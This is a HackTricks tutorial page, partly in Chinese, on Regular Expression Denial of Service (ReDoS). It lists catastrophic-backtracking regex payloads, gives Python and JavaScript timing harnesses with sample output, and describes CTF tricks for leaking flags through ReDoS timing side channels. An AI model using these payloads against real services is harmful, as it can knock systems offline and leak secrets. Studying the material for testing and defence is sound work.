Regular expression Denial of Service - ReDoS

Reading time: 8 minutes

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Regular Expression Denial of Service (ReDoS)

A Regular Expression Denial of Service (ReDoS) happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.

The Problematic Regex Naïve Algorithm

Check the details in https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS

Engine behavior and exploitability

  • Most popular engines (PCRE, Java java.util.regex, Python re, JavaScript RegExp) use a backtracking VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
  • Some engines/libraries are designed to be ReDoS-resilient by construction (no backtracking), e.g. RE2 and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.

Evil Regexes

An evil regular expression pattern is that one that can get stuck on crafted input causing a DoS. Evil regex patterns typically contain grouping with repetition and repetition or alternation with overlapping inside the repeated group. Some examples of evil patterns include:

  • (a+)+
  • ([a-zA-Z]+)*
  • (a|aa)+
  • (a|a?)+
  • (.*a){x} for x > 10

All those are vulnerable to the input aaaaaaaaaaaaaaaaaaaaaaaa!.

Practical recipe to build PoCs

Most catastrophic cases follow this shape:

  • Prefix that gets you into the vulnerable subpattern (optional).
  • Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many a, _, or spaces).
  • A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like !).

Minimal examples:

  • (a+)+$ vs input "a"*N + "!"
  • \w*_*\w*$ vs input "v" + "_"*N + "!"

Increase N and observe super‑linear growth.

Quick timing harness (Python)

python
import re, time
pat = re.compile(r'(\w*_)\w*$')
for n in [2**k for k in range(8, 15)]:
s = 'v' + '_'*n + '!'
t0=time.time(); pat.search(s); dt=time.time()-t0
print(n, f"{dt:.3f}s")

ReDoS 载荷

通过 ReDoS 的字符串外泄

在 CTF(或 bug bounty)中,你可能会 控制用于匹配敏感信息(flag)的 Regex。然后,当 Regex 匹配 时,让页面 冻结(超时或更长的处理时间),而在未匹配时不冻结,可能会很有用。这样你就能够逐字符 exfiltrate 字符串:

  • this post 中你可以找到这个 ReDoS 规则:^(?=<flag>)((.*)*)*salt$
  • 示例:^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
  • this writeup 中你可以找到这个:<flag>(((((((.*)*)*)*)*)*)*)!
  • this writeup 中他使用了:^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

ReDoS 控制输入和 Regex

下面是一些 ReDoS 示例,在这些示例中你同时控制 输入Regex

javascript
function check_time_regexp(regexp, text) {
var t0 = new Date().getTime()
new RegExp(regexp).test(text)
var t1 = new Date().getTime()
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
;[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach((regexp) => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

语言/引擎 注意事项(针对攻击者)

  • JavaScript (browser/Node): 内置的 RegExp 是回溯引擎,当 regex+input 都受攻击者影响时通常可被利用。
  • Python: re 使用回溯。长时间的模糊匹配序列加上失败的尾部常常导致灾难性回溯。
  • Java: java.util.regex 使用回溯。如果你只控制输入,寻找使用复杂校验器的端点;如果你控制 patterns(例如存储的规则),ReDoS 通常很容易实现。
  • RE2/RE2J/RE2JSRust regex crate 这样的引擎被设计为避免灾难性回溯。如果遇到这些引擎,应该关注其他瓶颈(例如过大的 patterns)或寻找仍在使用回溯引擎的组件。

工具

提示:当你仅能控制输入时,生成长度成倍增长的字符串(例如 2^k 个字符)并追踪延迟。延迟的指数增长强烈表明存在可利用的 ReDoS。

参考资料

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks